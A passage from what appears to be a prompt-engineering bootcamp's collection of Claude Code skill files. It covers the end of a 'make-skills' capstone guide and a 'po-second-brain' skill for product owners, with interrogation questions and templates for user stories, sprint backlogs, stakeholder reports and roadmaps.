- Expected: Error message: "Invalid email or password"
- Priority: P1
## Test Data Requirements
- Email account: test@example.com / ValidPass123!
- Email account: second@example.com / TestPass456!
- Test database with 100 sample users
- Staging environment with current feature code
## Success Criteria
- [ ] All P0 test cases pass
- [ ] All P1 test cases pass
- [ ] Error messages clear and actionable
- [ ] Login/logout flow works end-to-end
- [ ] No console errors or warnings
## Known Limitations
- **Out of scope for this test plan**: Load testing (separate performance testing)
- **Assumption**: Email service is working (not testing email delivery)
- **Browser coverage**: Chrome/Firefox only (Safari tested separately)
- **Not covered**: 3rd-party authentication (OAuth tested in integration suite)
## Sign-Off
| Role | Name | Date | Approved |
|------|------|------|----------|
| Dev Lead | [Dev Lead Name] | | ☐ |
| Product Manager | [PM Name] | | ☐ |
| QA Lead | [Your Name] | | ☐ |
---
## The Reflection: What You Just Built
Look at what you just created:
- It **ASKS questions** → Questions 1-9 are retrieval. They gather the specific context about YOUR feature, YOUR constraints, YOUR team
- It **ASSEMBLES your answers into structured context** → The interrogation responses get organized into a structured format (scenarios, test cases, data requirements)
- It **FEEDS that context to generation** → A test plan engine could take those structured answers and produce the test plan
**You just built a RAG system.**
Every skill is a RAG system:
- **Retrieval**: The interrogation questions fetch relevant context from your knowledge
- **Augmentation**: Your answers get organized into structured format
- **Generation**: The structured format becomes a test plan any team member can execute
The AI completing patterns? That's what an LLM does. Why does this structured approach work so much better than "write me a test plan"? The LLM was trained by humans who rewarded clear, structured, specific inputs — that's RLHF. You've been doing all three (retrieval, augmentation, generation) since the first bootcamp exercise.
```
---
### What The Participant Now Has
A complete, formatted skill file they can save to their Claude Code skills library and use immediately:
```bash
# They save it as:
~/.claude-code/skills/test-plan-generator/SKILL.md
# Or reference it in a Claude Code project
# And use it like any other skill in the bootcamp
```
---
## Design Principles
### Principle 1: Task Discovery is Non-Negotiable
Never skip Phase 1. The quality of Phase 3 (generated skill) depends entirely on how well you understand your own task. A vague skill leads to vague prompts.
### Principle 2: Your Expertise is the Content
The skill isn't generic — it captures YOUR process, YOUR team's standards, YOUR audience. Generic skills fail because they don't match your reality.
### Principle 3: Pattern Extraction Reveals Structure
Many people don't realize the patterns in their work until interrogated. The questions force you to articulate what's implicit.
### Principle 4: The Generated Skill is Just the Beginning
The skill file you generate is your starting point. You'll refine it as you use it, add examples, adjust questions based on what you learn.
---
## Integration with Bootcamp Patterns
### How Make-Skills Ties Everything Together
**Priority Builder Pattern** (ABCD):
- **Action**: Your weekly task (the skill you're building)
- **Behavior**: The questions you ask (structured interrogation)
- **Context**: The information you always need (assembled by Phase 2)
- **Delivered**: The skill file (production-ready artifact)
**ReAct Pattern** (THINK → ACT → OBSERVE):
The skill itself uses ReAct:
- **THINK**: What questions do I need to ask? (Phase 1-2)
- **ACT**: Ask them and gather answers (interaction)
- **OBSERVE**: Generate the skill file and verify it makes sense (Phase 3)
**RAG System** (Retrieval, Augmentation, Generation):
The culmination of everything:
- **Retrieval**: Questions fetch context (what you know about your task)
- **Augmentation**: Answers get structured (organized into sections)
- **Generation**: Structure becomes artifact (skill file or output)
**Context is Everything Intuition**:
The entire workflow is about context — discovering it, mapping it, and encoding it into a skill that can access it later.
**Structure Gets Rewarded Intuition**:
The output is never prose — it's always formatted skill files, interrogation frameworks, matrices. That structure is why it works.
**You Are the Retrieval System Intuition**:
The skill you build IS a retrieval system. It retrieves your expertise about your task, augments it into structure, and generates outputs your team can use.
---
## Advanced Usage: Skill Composition
Once you have a few skills, you can **compose them**:
```
Skill A: "Generate technical specification"
Skill B: "Create implementation plan"
Skill C: "Design test strategy"
Composed Workflow:
1. Use Skill A to generate spec for new feature
2. Feed that spec's output to Skill B
3. Feed that plan's output to Skill C
4. Now you have spec + plan + tests, all coherent
```
The more skills you build, the more you can chain them for complex workflows.
---
## When to Build a Skill
### Build a Skill If:
- ✅ You do this task at least weekly
- ✅ The output matters (affects others)
- ✅ It takes 30+ minutes
- ✅ You always gather the same information
- ✅ You want it more consistent
- ✅ Others could use it too
### Skip Skills If:
- ❌ You do it once per quarter (too infrequent)
- ❌ The output is just for you (lower ROI)
- ❌ It takes 2 minutes (IDE/templates work fine)
- ❌ The process changes dramatically each time
- ❌ It's already fully automated
---
## FAQ for Capstone Learners
**Q: Will the generated skill be perfect?**
A: No. It's your starting point. You'll refine it as you use it, adjust questions, improve output templates. That's normal.
**Q: Can I build a skill for something non-work?**
A: Absolutely! Recipe generation, travel planning, gift recommendation — anything with a repeatable process.
**Q: What if I can't articulate my process clearly?**
A: That's what the interrogation does. The skill will help you think through it step-by-step.
**Q: Can I combine two tasks into one skill?**
A: Only if they're truly the same process with different contexts. Otherwise, split them — two focused skills beat one bloated one.
**Q: How long until I'm confident building skills?**
A: After your first 2-3 skills, the pattern becomes obvious. By skill 5-6, you'll be able to design them in your head.
**Q: Can I share my skills with my team?**
A: Yes! If your skill captures team expertise, your team can use it. Over time, you'll have a library of organizational skills.
**Q: What if my skill doesn't work as expected?**
A: Debug it like code: Test with different inputs, check the interrogation questions, refine the output template. Iteration is normal.
**Q: Is there a format for advanced use cases (like multi-stage pipelines)?**
A: Yes, but start with the basic 3-phase format. Once you're comfortable, you can extend it.
---
## Bootcamp Integration
### For Participants
**This skill is:**
- ✅ The capstone exercise of the bootcamp
- ✅ A meta-demonstration of interrogation at the skill-level
- ✅ The moment you become a skill creator, not just a user
- ✅ Your first tool for scaling your expertise
**Use this skill when:**
- You finish all prerequisite skills and patterns
- You've seen 3-4 example skills (dev-second-brain, etc.)
- You want to automate your own repeated work
- You're ready to build organizational capability
**Expected outcome:**
- Generate a complete, usable skill file
- Understand RAG at a deep level (you built one)
- Start thinking about your work as "patterns to automate"
- Join the community of skill creators
### For Facilitators
**Introduce in:**
- Final session of bootcamp (Session 3 or later)
- Post-bootcamp office hours (perfect for 1-on-1 coaching)
- Advanced track materials
**Teaching approach:**
1. **Show the framework** (3 phases, interrogation questions)
2. **Walk through the example** (QA Lead building test-plan-generator)
3. **Have participants do Phase 1** (find their task, walk through it)
4. **Guide Phase 2** (help them extract patterns)
5. **Generate Phase 3** (show them their skill file)
6. **The reflection** (explain what they just built)
**Expected time:**
- Simple skill (document template): 30 minutes
- Moderate skill (test planning, code generation): 45 minutes
- Complex skill (architecture analysis, multi-stage workflow): 60+ minutes
---
## Example Skills Participants Have Built
### From Past Bootcamp Cohorts:
- **Sales Deck Generator** (Sales team) — interrogates about product, audience, pricing, differentiators → generates sales deck outline
- **Technical Specification Writer** (Engineering team) — interrogates about feature, stakeholders, constraints → generates spec template
- **Meeting Facilitator** (Management) — interrogates about meeting goal, attendees, outcomes → generates agenda + discussion guide
- **Code Review Checklist Generator** (QA/Dev team) — interrogates about codebase, tech stack, risks → generates custom review checklist
- **Customer Interview Template** (Product) — interrogates about research goals, user segment, hypotheses → generates interview guide
- **Incident Post-Mortem Facilitator** (DevOps) — interrogates about incident severity, systems affected, timeline → generates post-mortem structure
---
## Files in This Skill
- `SKILL.md` — Complete skill definition and usage guide (this file)
- `README.md` — Quick-start guide for bootcamp participants
---
## References
### Bootcamp Patterns Used
- **Priority Builder**: ABCD framework for structured thinking
- **ReAct**: Reasoning + Acting pattern
- **RAG System**: Retrieval, Augmentation, Generation paradigm
- **Interrogation Workflow**: Questions before answers
### Academic References
- Yao et al. (2022) "ReAct: Synergizing Reasoning and Acting in Language Models"
- Lewis et al. (2020) "Retrieval-Augmented Generation for Knowledge-Intensive NLP Tasks"
- Brown et al. (2020) "Language Models are Few-Shot Learners"
---
**Version**: 1.0
**Status**: Production-ready for bootcamp capstone
**Last Updated**: 2026-03-18
**For**: Joey's Prompt Engineering Bootcamp v2 — Capstone Track
---
## Quick Start
1. **Choose a task** you repeat weekly
2. **Answer the Phase 1 discovery questions** (5 min)
3. **Extract the pattern** in Phase 2 (5 min)
4. **Get your generated skill file** (automatic)
5. **Read the reflection** section to understand what you built
6. **Save and use it** with your Claude Code or share with your team
---
# skills-po-second-brain.md
# https://jrlopez.dev/p/skills-po-second-brain.md
---
name: po-second-brain
description: PO/PM second brain — interrogation-driven requirements capture, sprint planning, and stakeholder communication using systematic patterns
version: 1.0
---
# PO/PM Second Brain Skill
## Overview
The **PO/PM Second Brain** is an expert assistant that guides Product Owners and Project Managers through complex planning and communication challenges using three bootcamp intuitions:
1. **Context is everything** — Gathers rich context about stakeholders, constraints, and success criteria before generating requirements
2. **Structure gets rewarded** — Uses structured output (user stories, roadmaps, reports) instead of loose narrative
3. **You are the retrieval system** — Acts as an automated knowledge retrieval system for project context and team alignment
This skill enables POs/PMs to tackle:
- ✅ Requirements capture (turning conversations into structured stories)
- ✅ Sprint planning (breaking epics into stories with estimates)
- ✅ Stakeholder communication (status reports, steering decks, escalations)
- ✅ Roadmap planning (prioritization using value/effort/risk framework)
---
## Key Capabilities
### 1. Interrogation-Driven Workflow
Gathers structured context before generating requirements using a **25-question style interview** adapted for POs/PMs:
- **Stakeholder Context**: Business goals, success definition, key stakeholders
- **Project Scope**: Epics, features, must-haves vs. nice-to-haves
- **Constraints**: Timeline, budget, team capacity, dependencies
- **Team Composition**: Team size, experience level, existing patterns
- **Risk & Acceptance**: Known risks, acceptance criteria patterns, validation approach
### 2. Spec-Kit Methodology
Generates requirements and plans using **Knowledge → Specification → Plan → Execution**:
```
Knowledge: What do we know about the problem? (From interrogation)
Specification: What are we building? (User stories, acceptance criteria)
Plan: How will we build it? (Roadmap, sprint breakdown, timeline)
Execution: Who does what, when? (Task assignments, dependencies)
```
### 3. Structured Output Formats
- **User Stories**: Title, acceptance criteria (Given/When/Then), story points, dependencies
- **Sprint Backlog**: Stories with estimates, priorities, capacity planning
- **Stakeholder Report**: Executive summary, progress, risks, asks with clear ownership
- **Prioritized Roadmap**: Ranked features with rationale (value/effort/risk scores)
---
## Usage Scenarios
Choose the scenario matching your current task:
### **Scenario A: Requirements Capture**
*Turning stakeholder conversations into structured user stories with acceptance criteria*
**When to use**: "We need to document requirements for our new feature"
**What you'll get**: User stories with acceptance criteria, priority ranking, dependency mapping, edge cases identified
### **Scenario B: Sprint Planning**
*Breaking epics into stories, estimating, identifying dependencies*
**When to use**: "Help me plan the next 2-week sprint"
**What you'll get**: Sprint backlog with estimates, capacity check, dependency graph, burn-down projections
### **Scenario C: Stakeholder Communication**
*Status reports, steering committee decks, risk escalations*
**When to use**: "I need a status report for exec leadership"
**What you'll get**: Executive summary, progress metrics, risks with mitigation, asks with clear impact statements
### **Scenario D: Roadmap Planning**
*Feature prioritization using value/effort/risk framework*
**When to use**: "We have 15 features to prioritize for Q2-Q3"
**What you'll get**: Ranked roadmap with rationale, resource allocation, timeline projections, risk adjustments
---
## Structured Interrogation Framework
The skill will ask you these questions to build context:
### Phase 1: Business Context (6-8 questions)
1. **Company/Product**: What are we building? (SaaS, internal tool, mobile app, etc.)
2. **Business Goal**: What's the north star metric? (Revenue, retention, cost savings, efficiency?)
3. **Current State**: How is this done today? (Manual process, competitor, legacy system?)
4. **Success Definition**: How will we know this is successful? (Metrics, adoption, feedback?)
5. **Stakeholders**: Who are the key stakeholders? (Executive sponsor, users, customers, team leads?)
6. **Timeline**: When do we need this? (Hard deadline, flexible, market window?)
### Phase 2: Scope & Requirements (5-7 questions)
7. **Scope Statement**: What's in scope, what's out? (MVP vs. future features?)
8. **Primary Users**: Who are the primary users? (Customer, internal, both?)
9. **Key Workflows**: What are 3-4 critical user flows? (Signup, payment, reporting, etc.)
10. **Constraints**: What's non-negotiable? (Technology, budget, team size, compliance?)
11. **Dependencies**: What other projects/systems does this depend on?
12. **Known Unknowns**: What risks or uncertainties exist?
### Phase 3: Team & Capacity (3-4 questions)
13. **Team Size**: How many developers, designers, QA? What's the team composition?
14. **Team Experience**: What's your team's experience with this domain?
15. **Existing Patterns**: What design patterns, tech stack does the team use?
16. **Velocity**: What's your typical sprint velocity? (Story points, features per sprint?)
### Phase 4: Acceptance & Validation (3-4 questions)
17. **Acceptance Criteria Style**: Do you use Given/When/Then, checklist, or other format?
18. **Definition of Done**: What makes a story "done"? (Code review, tests, deployment, user validation?)
19. **Validation Approach**: How will stakeholders validate completion? (Demo, metrics, user testing?)
20. **Rollback Plan**: What's your safety net if something doesn't work?
### Phase 5: Knowledge & Decisions (2-3 questions)
21. **Decision Constraints**: Are there decisions that limit options? (Platform choices, compliance, etc.)
22. **Tribal Knowledge**: What does every PM wish they knew about this project?
23. **Competitive Intel**: How do competitors handle this? Any lessons learned?
---
## Output Format Specification
### 1. User Story with Acceptance Criteria
```markdown
## User Story: [Feature Title]
**Story ID**: PROJ-123
**Sprint**: Q2 Sprint 2
**Priority**: High
**Estimate**: 8 points
**Owner**: [Team member]
### Description
As a [user type], I want to [action], so that [benefit].
**Example**: As a **customer**, I want to **schedule a meeting with a sales rep**, so that **I can get personalized help without waiting**.
### Acceptance Criteria
Given the customer is on the Products page
When they click "Schedule Demo"
Then they see a calendar picker for available time slots
Given the customer selects a time slot
When they submit the form
Then an email confirmation is sent to them and their customer success rep
Given a customer tries to book outside business hours
When they submit
Then they see an error message and are offered the next available slot
### Edge Cases
- What if no time slots are available? (Show "Book a callback" form instead)
- What if customer's timezone is different? (Show times in their timezone)
- What if the sales rep's calendar is unavailable? (Auto-select next available rep)
### Dependencies
- Requires Calendar service integration (tracked in PROJ-456)
- Requires email notification system (existing)
### Success Criteria
- [ ] Calendar integration working end-to-end
- [ ] Email confirmations sent within 1 minute
- [ ] 80% of customers book within first 2 weeks
- [ ] No more than 5% booking errors
```
### 2. Sprint Backlog with Capacity Planning
```markdown
## Sprint 12 Backlog: Q2 Week 2-3
**Sprint Goal**: Launch customer meeting scheduling + payment integration
**Team Capacity**: 40 points (5 developers × 8 points/sprint)
**Forecast**: 38 points committed (95% utilization)
### High Priority Stories (15 points)
- [ ] PROJ-123: Schedule Demo Calendar Picker (8 pts) — Owner: Alice
- [ ] PROJ-124: Email Confirmation Emails (5 pts) — Owner: Bob
- [ ] PROJ-125: Calendar API Error Handling (2 pts) — Owner: Carol
**Dependencies**: None. Can start immediately.
### Medium Priority Stories (12 points)
- [ ] PROJ-126: Payment Gateway Integration (8 pts) — Owner: David
- [ ] PROJ-127: Invoice Generation (4 pts) — Owner: Eve
**Dependencies**: Blocked by PROJ-128 (3rd-party API credentials, expected EOD tomorrow)
### Nice-to-Have Stories (11 points)
- [ ] PROJ-128: Multi-timezone Support (5 pts) — Owner: Frank
- [ ] PROJ-129: Analytics Dashboard (6 pts) — Owner: Grace
**Dependencies**: None, can be deferred if other stories slip.
### Sprint Capacity Breakdown
| Developer | Committed | Max | Notes |
|-----------|-----------|-----|-------|
| Alice | 8 | 8 | Full capacity on calendar |
| Bob | 5 | 8 | Can take 3 more points |
| Carol | 2 | 8 | Light week, can help others |
| David | 8 | 8 | Full on payments |
| Eve | 4 | 8 | Can take 4 more points |
| **Total** | **38/40** | **40** | 2 point buffer |
### Risk Register
| Risk | Impact | Probability | Mitigation |
|------|--------|-------------|-----------|
| Calendar API rate limits | Medium | Medium | Add caching layer (Carol) |
| Payment vendor delays | High | Low | Have fallback processor (David) |
| Team unfamiliar with new auth system | Medium | Medium | Pair Frank with Alice |
### Burn-Down Projection
- **Day 1-3**: 35 points (steep initial progress)
- **Day 4-5**: 20 points (testing phase)
- **Day 6-7**: 2 points (buffer)
- **Expected completion**: Day 8 of 10 (healthy buffer)
```
### 3. Stakeholder Report (Executive Summary)
```markdown
## Q2 Progress Report & Steering Committee Update
**Period**: Week 1-2 of Q2 2026
**Report Date**: March 15, 2026
**Audience**: Executive Leadership, Steering Committee
---
## Executive Summary
**Status**: 🟢 On Track
**Overall Progress**: 52% of Q2 roadmap complete (target: 50%)
**Key Milestone**: Customer onboarding portal launches March 25 (on schedule)
### The Ask
We need approval to add **1 designer and 1 QA engineer** to the team for Q3 to maintain velocity given increased feature requests. **Impact**: Prevents 2-week roadmap slip. **Cost**: $65K for 3 months.
---
## Progress Snapshot
### Completed (This Period)
✅ **User Authentication System** (PROJ-100-110)
- All acceptance criteria met
- 94% test coverage
- Zero critical bugs in QA
- Customer acceptance testing passed
✅ **Payment Integration** (PROJ-120-125)
- Stripe and PayPal connected
- End-to-end testing complete
- Ready for March 25 launch
### In Progress (Next 2 Weeks)
🔵 **Customer Onboarding Portal** (PROJ-200-210)
- 60% complete, on track for March 25
- Demo scheduled March 20 for executive feedback
- No blockers identified
🔵 **Analytics Dashboard** (PROJ-300-310)
- 35% complete, slight lag on data pipeline work
- Reassigned best engineer (Carol) to help; expect to catch up by March 22
### At Risk / Upcoming
🟡 **Mobile App Redesign** (PROJ-400-410)
- Starts April 1, depends on new design resource
- Current designer (Frank) overallocated at 120% capacity
- **Mitigation**: Hire contractor designer by March 25
---
## Metrics That Matter
| Metric | Target | Current | Status |
|--------|--------|---------|--------|
| Feature Delivery Rate | 12 features/quarter | 11 features (on pace) | 🟢 On track |
| Customer Adoption | 500 signups/month | 480 (March) | 🟡 Slightly below |
| Quality (P1 bugs) | <2 per sprint | 1 avg | 🟢 Healthy |
| Team Satisfaction | >8/10 | 7.8/10 | 🟡 Slight burnout signals |
| Time to Market | 2-week sprints | 2 weeks avg | 🟢 Consistent |
---
## Risk Register
| Risk | Impact | Status | Owner | Mitigation |
|------|--------|--------|-------|-----------|
| **Designer capacity (Frank at 120%)** | High | 🔴 Active | Sarah | Hire contractor, redistribute work |
| **Analytics data pipeline delay** | Medium | 🟡 Watching | Carol | Assigned best engineer, on track |
| **Customer adoption below forecast** | High | 🟡 Watching | Marketing | A/B test onboarding UX, gather feedback |
| **Mobile app timeline compression** | Medium | 🟢 Mitigated | Product | Hired contractor designer |
---
## What We Need From You
| Ask | Impact | Timeline |
|-----|--------|----------|
| **Approve 2 hires for Q3** | Prevents 2-week roadmap slip | Decision needed by March 31 |
| **Review design contractor proposal** | Keeps mobile app on schedule | Decision needed by March 25 |
| **Feedback on onboarding portal demo** | Ensures customer alignment | March 20 demo |
---
## Next Steps
1. **March 20**: Executive demo of customer onboarding portal
2. **March 25**: Launch customer onboarding portal to production
3. **March 31**: Staffing decision on Q3 hires (impacts roadmap)
4. **April 1**: Mobile app redesign begins with contractor designer
---
**Report prepared by**: [Your name]
**Questions?**: [Contact info]
```
### 4. Prioritized Roadmap with Rationale
```markdown
## Q2-Q3 Product Roadmap
**Planning Horizon**: 24 weeks
**Total Features Under Consideration**: 18
**Committed (Q2)**: 12 features | 40 points
**Planning (Q3)**: 6 features | TBD
---
## Prioritization Framework
Each feature is scored on **Value (1-5)**, **Effort (1-5)**, **Risk (1-5)**, producing priority rank:
```
Priority Score = (Value × 3 + Revenue Impact) - (Effort × 2 + Risk × 1.5)
Rank 1-5 = Highest priority (launch first)
Rank 6-10 = Medium priority (launch if capacity)
Rank 11+ = Future or defer
```
---
## Ranked Roadmap: Q2-Q3
### Tier 1: Launch Now (Q2, Weeks 1-6)
| Rank | Feature | Value | Effort | Risk | Impact | Owner | Status |
|------|---------|-------|--------|------|--------|-------|--------|
| 1 | **Payment Integration** | 5 | 4 | 2 | Revenue generation | David | 90% done |
| 2 | **Customer Onboarding Portal** | 5 | 3 | 1 | Reduces support burden 40% | Alice | 60% done |
| 3 | **Email Notifications** | 4 | 2 | 1 | Critical for adoption | Bob | Backlog |
| 4 | **User Authentication Upgrade** | 4 | 3 | 3 | Security compliance | Carol | 80% done |
**Rationale**: All four features unlock revenue, reduce support load, and have clear success metrics. Payment and onboarding are customer-facing and high-impact. Should complete by March 31.
**Resource Allocation**: Alice (onboarding), David (payments), Carol (auth), Bob (notifications) — total 15 points.
---
### Tier 2: Plan for Q3 (Weeks 7-12)
| Rank | Feature | Value | Effort | Risk | Impact | Owner | Status |
|------|---------|-------|--------|------|--------|-------|--------|
| 5 | **Analytics Dashboard** | 5 | 4 | 2 | Reveals user patterns | Frank | Backlog |
| 6 | **Mobile App Redesign** | 4 | 5 | 3 | Improves engagement | Grace | Blocked: contractor |
| 7 | **API Rate Limiting** | 3 | 2 | 1 | Prevents abuse | Carol | Backlog |
| 8 | **Advanced Search** | 3 | 3 | 2 | Nice-to-have UX | Henry | Backlog |
**Rationale**: Analytics reveals what users care about (informs future prioritization). Mobile redesign is high-effort but high-value. API work is technical debt but necessary for scale.
**Dependencies**: Mobile redesign blocked by contractor hiring (expected March 31). Analytics depends on payment data (will be available from Q2 launch).
---
### Tier 3: Defer to Q4+ (If Capacity)
| Rank | Feature | Value | Effort | Risk | Reason for Defer |
|------|---------|-------|--------|------|-----------------|
| 9 | **Bulk CSV Import** | 2 | 4 | 2 | Low customer demand |
| 10 | **Custom Workflows** | 2 | 5 | 3 | Complex, low ROI |
| 11 | **Advanced Permissions** | 3 | 3 | 1 | Can be addressed in Q4 |
| 12+ | **Mobile Offline Mode** | 1 | 4 | 4 | Rare use case, high risk |
**Rationale**: These features are either low-impact (bulk import), high-complexity with low ROI (custom workflows), or not yet critical (offline). Revisit in Q4.
---
## Timeline & Capacity Projection
```
Q2 (Weeks 1-6): Tier 1 Features
├─ Week 1-3: Finish Payment + Onboarding (15 points)
├─ Week 3-5: Email notifications (8 points)
├─ Week 5-6: Auth upgrade buffer (7 points)
└─ Week 6: Customer demo + launch to production
Q3 (Weeks 7-12): Tier 2 Features
├─ Week 7-9: Analytics dashboard (12 points, requires new designer + mobile contractor)
├─ Week 9-11: Mobile redesign (15 points, with contractor)
├─ Week 11-12: API work + polish (5 points)
└─ Week 12: Stability & buffer
Q4+: Tier 3 + Customer-Driven Features
```
---
## Risk Adjustments
**Team capacity**: Current team at 90% capacity. Tier 2 assumes **1 designer + 1 contractor** hired by March 31.
**Timeline risk**: If contractor hire slips, Mobile redesign (Rank 6) moves to Q4.
**Market risk**: Mobile app redesign could be reprioritized if competitor launches; have contingency.
---
## Success Metrics (How We'll Know This Worked)
By end of Q3:
- ✅ Payment integration processing >$100K/month
- ✅ Onboarding portal adopted by >70% of new customers
- ✅ Analytics dashboard reveals >3 actionable customer insights
- ✅ Mobile app engagement increases 25% post-redesign
- ✅ Team satisfaction improves to >8.5/10
---
**Roadmap Last Updated**: March 15, 2026
**Next Review**: April 1, 2026
**Stakeholders**: Product, Engineering, Design, Executive
```
---
## Using the Skill: Step-by-Step Workflow
### Step 1: Choose Your Scenario
```
"I need to capture requirements from our stakeholder interviews"
→ Scenario A (Requirements Capture)
"Help me plan the next 2-week sprint from our backlog"
→ Scenario B (Sprint Planning)
"I need to brief executives on Q2 progress and risks"
→ Scenario C (Stakeholder Communication)
"I have 20 features to prioritize for the next 2 quarters"
→ Scenario D (Roadmap Planning)
```
### Step 2: Let the Skill Interrogate
The skill will ask 20-25 questions. **Answer fully and honestly** — this is where context richness happens.
Example interrogation flow:
```
Q1: What are we building?
A: A customer onboarding portal for our SaaS product
Q2: What's the business goal?
A: Reduce customer implementation time from 4 weeks to 2 weeks, improve retention
Q3: Who are the key stakeholders?
A: CEO, VP of Customer Success, sales team, 3-4 pilot customers
Q4: What's your timeline?
A: Must launch March 25 for Q2 goals, before sales kickoff
Q5: How many developers?
A: Team of 5, mixed seniority. This is new domain for most of them.
[... continues through all 25 questions ...]
```
### Step 3: Review Generated Artifacts
The skill will output:
- ✅ User stories with acceptance criteria (Given/When/Then format)
- ✅ Sprint backlog with capacity planning and burn-down projections
- ✅ Stakeholder report with executive summary and asks
- ✅ Prioritized roadmap with value/effort/risk scoring
### Step 4: Align & Execute
Take generated artifacts to team:
- Share user stories in backlog tool (Jira, Linear, Asana)
- Review sprint backlog with team in planning meeting
- Present stakeholder report to exec sponsors
- Walk through roadmap with engineering leads to refine estimates
---
## Design Principles
### Principle 1: Context Over Guessing
**Never generate requirements without understanding:**
- What problem does this solve for customers?
- What constraints exist (timeline, budget, team)?
- What does success look like (metrics, not just features)?
- What could go wrong (risks, dependencies)?
The interrogation phase ensures rich context before any artifacts.
### Principle 2: Structure Over Narrative
**Always output:**
- Structured user stories (not rambling requirements docs)
- Ranked backlogs (not brain dumps)
- Executive summaries (not long narratives)
- Prioritized roadmaps (not wishlists)
Bootcamp intuition: Structure gets rewarded.
### Principle 3: Spec-Kit Methodology
**Always follow knowledge → specification → plan → execution:**
- **Knowledge**: What did we learn in interrogation?
- **Specification**: What are we building? (User stories)
- **Plan**: How will we build it? (Sprint backlog, timeline)
- **Execution**: Who does what? (Task ownership, dependencies)
This ensures nothing is missed.
### Principle 4: Acceptance Criteria Over Vagueness
**Every story includes:**
- Given/When/Then format (testable conditions)
- Edge cases identified
- Definition of Done criteria
- Explicit success metrics
This prevents the "I thought it meant..." conversations.
---
## Example: Complete Workflow
### Scenario: Requirements Capture for Customer Onboarding Portal
**You say:**
```
We need to build a customer onboarding portal.
It should help new customers get set up quickly without talking to our support team.
We have 5 developers, need to launch in 6 weeks, and we have 3 pilot customers willing to test.
```
**Skill interrogates (Phase 1: Business Context):**
```
Q1: What's the north star metric?
→ "Reduce implementation time from 4 weeks to 2 weeks"
Q2: Current state?
→ "Support team manually walks each customer through setup via Zoom calls"
Q3: Success definition?
→ "70% of new customers complete onboarding without support intervention"
Q4: Key stakeholders?
→ "VP of Customer Success (sponsor), 3 pilot customers, support team, sales"
Q5: Timeline?
→ "Hard deadline March 25 for Q2 goals"
```
**Skill interrogates (Phase 2: Scope & Requirements):**
```
Q6: Primary user?
→ "New customers (SMB to mid-market companies)"
Q7: Key workflows?
→ "1) Create account & login, 2) Configure settings, 3) Upload data, 4) Run first report, 5) Invite team members"
Q8: Constraints?
→ "Must work with existing auth system, no new infrastructure, budget $50K for contractor design help"
Q9: Known risks?
→ "Customers may have complex legacy data formats; support team will need training"
```
**Skill interrogates (Phase 3: Team & Capacity):**
```
Q10: Team composition?
→ "3 backend engineers, 1 frontend engineer, 1 QA, design contractor (4 weeks), I'm the PM"
Q11: Team experience?
→ "Backend experienced with Python/FastAPI; frontend new to React; no one knows our data formats"
Q12: Velocity?
→ "Typically 20 points per 2-week sprint"
```
**Skill interrogates (Phase 4: Acceptance & Validation):**
```
Q13: Acceptance criteria style?
→ "Given/When/Then format, we track with Jira"
Q14: Definition of Done?
→ "Code review approved, >80% test coverage, deployed to staging, pilot customer tested"
Q15: Validation?
→ "Pilot customers demo with VP of Customer Success; if 2/3 say 'ready', we ship"
```
---
### Skill Generates: User Stories
```markdown
## User Story: Create Account & Login
**Story ID**: ONBOARD-101
**Sprint**: Q2 Sprint 2-3
**Priority**: Critical (blocks all other workflows)
**Estimate**: 5 points
**Owner**: Frontend engineer
### Description
As a **new customer**, I want to **create an account and log in**, so that **I can start configuring my settings**.
### Acceptance Criteria
Given I'm on the landing page
When I click "Get Started"
Then I see a sign-up form asking for company name, email, and password
Given I fill in valid information
When I click "Create Account"
Then my account is created and I'm logged in
And I see the onboarding dashboard (next workflow)
Given I already have an account
When I click "Log In"
Then I see a login form
And after entering credentials, I'm logged in to the dashboard
Given I try to log in with invalid credentials
When I click "Log In"
Then I see an error message "Invalid email or password"
And my account is NOT locked (retry allowed)
Given I forget my password
When I click "Forgot Password"
Then I receive a password reset email within 1 minute
And I can set a new password via the email link
### Edge Cases
- What if customer enters email already used? (Show error, suggest login)
- What if password is too weak? (Show strength meter, enforce minimum complexity)
- What if customer closes browser before email confirmation? (Session expires after 24 hours, can resend)
### Dependencies
- ONBOARD-100: Design the login/signup UI (frontend)
- Uses existing OAuth provider (auth system)
- No new backend work needed
### Acceptance Checklist
- [ ] Frontend: Sign-up form renders correctly
- [ ] Backend: Account created in database with hashed password
- [ ] Email: Welcome email sent within 1 minute
- [ ] Security: No SQL injection, password validation works
- [ ] Test coverage: >80% of login paths tested
- [ ] Pilot test: 2/3 pilot customers successfully sign up
```
```markdown
## User Story: Configure Settings
**Story ID**: ONBOARD-102
**Sprint**: Q2 Sprint 3
**Priority**: High
**Estimate**: 8 points
**Owner**: Backend engineer
### Description
As a **new customer**, I want to **configure my basic settings** (company name, timezone, data retention policy), so that **the system knows how to handle my data**.
### Acceptance Criteria
Given I just logged in
When I navigate to Settings
Then I see a form with fields: Company Name, Timezone, Data Retention (30/90/365 days), Industry
Given I fill in settings and click "Save"
Then my settings are saved to the database
And I see a confirmation message "Settings saved successfully"
And the settings are immediately applied to my dashboard
Given I change my timezone from UTC to EST
When I save
Then all timestamps displayed on my dashboard now show EST
And the change takes effect immediately
Given a field is required (e.g., Company Name)
When I try to save without filling it
Then I see an inline error message "Company name is required"
And the form is not submitted
Given I accidentally navigate away
When I come back
Then my unsaved changes are NOT lost (browser stores locally)
And I can either save or discard
### Edge Cases
- What if customer selects a timezone not in our supported list? (Use closest match, show note)
- What if customer changes retention policy? (Data older than new policy is NOT deleted retroactively, only new data follows new policy)
- What if customer's industry isn't in our list? (Allow free-text entry)
### Dependencies
- ONBOARD-101: Customer must be logged in first
- Uses existing database table (no migration needed)
### Acceptance Checklist
- [ ] Frontend: Settings form renders and saves
- [ ] Backend: Settings persisted to database
- [ ] Timezone: All timestamps converted correctly
- [ ] Data retention: Policy logic documented for future data handling
- [ ] Test coverage: >80% of settings paths tested
- [ ] Pilot test: 2/3 customers confirm settings work as expected
```
---
### Skill Generates: Sprint Backlog
```markdown
## Sprint 2-3 Backlog: Onboarding Portal MVP
**Sprint Goal**: Launch customer onboarding portal MVP with account creation, settings, and data upload.
**Team Capacity**: 40 points (5 developers × 8 points/sprint)
**Forecast**: 38 points committed
### Stories (In Priority Order)
#### Critical Path (Must Have)
- [x] ONBOARD-101: Create Account & Login (5 pts) — Frontend engineer — **DONE**
- [x] ONBOARD-102: Configure Settings (8 pts) — Backend engineer — **IN PROGRESS**
- [ ] ONBOARD-103: Upload Data (13 pts) — Backend + Frontend — **BACKLOG**
- [ ] ONBOARD-104: Run First Report (8 pts) — Backend + Frontend — **BACKLOG**
- [ ] ONBOARD-105: Invite Team Members (4 pts) — Backend — **BACKLOG**
**Subtotal**: 38 points
